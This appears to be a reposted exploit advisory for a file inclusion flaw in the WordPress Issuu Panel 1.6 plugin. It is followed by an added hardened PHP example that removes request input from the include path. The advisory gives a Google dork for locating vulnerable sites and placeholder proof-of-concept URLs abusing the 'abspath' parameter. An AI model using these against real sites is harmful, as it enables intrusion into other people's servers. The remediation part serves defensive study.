WordPress Issuu Panel 1.6 Remote / Local File Inclusion
Posted on 30 November -0001
# Exploit Title: Wordpress Plugin Issuu Panel - RFI & LFI
# Exploit Author: CrashBandicot
# Date: 2016-03-23
# Google Dork : inurl:/wp-content/plugins/issuu-panel/
# Vendor Homepage: https://wordpress.org/plugins/issuu-panel/
# Tested on: MsWIn
# Version: 1.6

# Vulnerable File : menu/documento/requests/ajax-docs.php

3. require($_GET['abspath'] . '/wp-load.php');

# PoC :

http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[RFI]
http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[LFI]
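
The `require` on line 3 of ajax-docs.php builds its include path from the `abspath` query parameter, which is the root cause of both the remote and local inclusion. The following is an added example, not the plugin's code or the vendor's fix: one hardened shape for such an endpoint, where WordPress loads the file itself and the request is served through admin-ajax.php. The action name `example_issuu_docs`, the handler name, the `page` parameter and the `manage_options` capability are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's code. Names prefixed "example_" are hypothetical.

// Vulnerable pattern from the advisory (ajax-docs.php, line 3), kept as a comment:
//   require($_GET['abspath'] . '/wp-load.php');
// The include path is built from request input, so the caller chooses the file.

// Hardened pattern: this file is loaded by WordPress (for example from the
// plugin's main file), so core has already defined ABSPATH. A direct HTTP
// request to this script has no ABSPATH and is refused before any include.
if (!defined('ABSPATH')) {
    http_response_code(403);
    exit;
}

// Serve the request through admin-ajax.php instead of a standalone script
// that has to bootstrap WordPress on its own.
add_action('wp_ajax_example_issuu_docs', 'example_issuu_docs_handler');

function example_issuu_docs_handler()
{
    // Reject requests that do not carry a valid nonce for this action.
    check_ajax_referer('example_issuu_docs', 'nonce');

    // Restrict the endpoint to privileged users (capability is an assumption).
    if (!current_user_can('manage_options')) {
        wp_send_json_error(array('message' => 'Forbidden'), 403);
    }

    // Request input is treated as data only, never as part of a file path.
    $page = isset($_POST['page']) ? absint($_POST['page']) : 1;

    wp_send_json_success(array('page' => max(1, $page)));
}
```

With `allow_url_include` left at its PHP default of Off, `require` refuses URL wrappers, which limits the remote variant but does nothing for the local one; removing request input from the include path addresses both.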